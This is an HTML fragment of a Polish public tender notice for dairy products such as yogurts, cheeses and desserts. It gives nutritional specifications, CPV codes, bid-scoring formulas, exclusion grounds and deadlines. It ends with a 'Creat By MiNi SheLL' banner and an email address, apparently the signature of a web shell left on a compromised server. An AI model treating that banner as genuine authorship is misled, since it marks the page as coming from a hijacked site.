kg<br/>19	jogurt typu choco stars Macadamia mix np. Muller, opak. 130g lub równoważne, za kryteria równoważności uznaje się wartość odżywcza w 100g to 131kcal, tłuszcz min. 4,6g, węglowodany 17,6 g, w tym cukry max. 15,2g, białko min.3,9g,sół 0,15g. 200	kg<br/>20	serek z truskawkami typu Hej, opak. 170g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g, 138 kcal,tłuszcz min.3,6g, węglowodany min.20g w tym cukry max.19g, białko min.6,3g	300	kg<br/>21	jogurt pitny butelka, różne smaki, opak. 250 – 300g wartość odżywcza w 100g: tłuszcz min. 1,8g węglowodany w tym cukry max. 9,5g, białko min. 3,0g, sól max. 0,15g	500	l<br/>22	ser camembert pleśniowy, różne smaki, opak. 120- 300g wartość odżywcza w 100g: tłuszcz min. 31g węglowodany w tym cukry max. 0,05g, białko min. 18g, sól max. 1,7g	250	kg<br/>23	jogurt typu jogobella musli, różne smaki, opak. 200g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 3,1g, białko min. 3,8g, węglowodany min. 13,2g, 400	kg<br/>24	deser typu smakija kaszka, różne smaki, opak 130g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: mleko pełne min. 59%, kaszka manna z pszenicy min. 5,6%	200	kg<br/>25	deser typu łaciaty z maślanką, różne smaki, opak. 170g wartość odżywcza w 100g: tłuszcz min. 6g węglowodany w tym cukry max. 14g, białko min.3,8g, sól max.0,1g,wapń min.120mg.	200	kg<br/>26	serek topiony typu mlekpol, różne smaki, opak. 100g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min.28g, białko min.10g, węglowodany min.1,2g,max cukry 1,2g,max sól 1,7g. 150	kg<br/>27	deser typu poezja polmlek, różne smaki, opak 180g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g:tłuszcz min.4,9g, węglowodany min.17g,cukry max.14g, białko min.3,40g, sól max.0,16g.	200	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15551320-4 - Jogurt z dodatkiem substancji smakowych</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15542200-1 - Ser miękki</p> <p class="mb-0">15833100-7 - Desery</p> <p class="mb-0">15543100-7 - Ser z przerostami pleśni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.2 Ocena ofert zostanie dokonana według następujących zasad:<br/>a) cena oferty C – proporcjonalnie wg wzoru - maksymalna ilość punktów 60.<br/>	<br/>	najniższa oferowana cena brutto <br/>	C =  x 100 pkt. x 60%<br/> cena brutto oferty badanej <br/><br/>b) czas dostawy zamówień interwencyjnych Cz - proporcjonalnie wg wzoru - maksymalna ilość punktów 40.<br/>Lp.	Oferowany czas dostawy zamówień interwencyjnych:	Liczba przyznanych punktów za oferowany czas dostawy.<br/>1.	do 1h	100 pkt.<br/>2.	od 1h do 2h 50 pkt.<br/>3.	od 2h do 4 h 25 pkt.<br/>4.	powyżej 4h 0 pkt<br/><br/>Cz = ilość przyznanych punktów za podany czas dostawy zamówień interwencyjnych / wg tabeli / x 40%<br/><br/>Jeżeli Wykonawca nie wpisze wymaganych danych dot. czasu dostawy zamówień interwencyjnych <br/>w formularzu ofertowym stanowiącym załącznik nr 1, wówczas Zamawiający przyjmie najdłuższy czas dostawy. <br/><br/>Zwycięży oferta, która uzyska najwyższą ilość punktów po przeliczeniu udziału procentowego w każdym kryterium – dot. każdej części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dostawy zamówień interwencyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1	Dokument potwierdzający stosowanie systemu HACCP (Podstawa prawna: art. 59, 59a i 73 ustawy z dnia 25 sierpnia 2006 r. <br/>o bezpieczeństwie żywności i żywienia Dz. U. z 2023 r. poz. 1448 z późn. zm.)	Dokumentem tym może być jeden <br/>z niżej wymienionych:<br/>- certyfikat HACCP,<br/>- certyfikat wydany przez firmy posiadające akredytację <br/>i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju,<br/>- zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub Inspekcji Weterynaryjnej,<br/>- oświadczenie Wykonawcy.<br/>Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem. <br/>W przypadku, gdy dokument został wystawiony w postaci papierowej <br/>i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym, zaufanym lub osobistym podpisem elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>2	Wykaz samochodów posiadających decyzję<br/>właściwego organu dopuszczającego pojazdy do przewozu żywności.	Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem.<br/>Wymagany oryginał dokumentu lub kopia potwierdzona za zgodność <br/>z oryginałem. <br/>W przypadku, gdy dokument został wystawiony w postaci papierowej <br/>i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym, zaufanym lub osobistym podpisem elektronicznym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2.	Na podstawie art. 107 ust. 2 jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1	W przypadku Wykonawców składających ofertę wspólną, stosowne oświadczenia lub dokumenty, o których mowa w pkt. 2 (tabela), składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie.<br/>1.2	W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz ze swoim oświadczeniem wstępnym, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, <br/>w jakim Wykonawca powołuje się na jego zasoby.<br/>1.3	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę).<br/>1.4	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo (nie dotyczy spółki cywilnej), o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.5	Oferta musi być podpisana w taki sposób, by prawnie obowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków i ich wprowadzania zawiera zał n4 - projektowane postanowienia umowy stanowiący integralna część postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-04 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę w oparciu o załącznik nr 1 Formularza ofertowego udostępnionego przez Zamawiającego na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-04 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com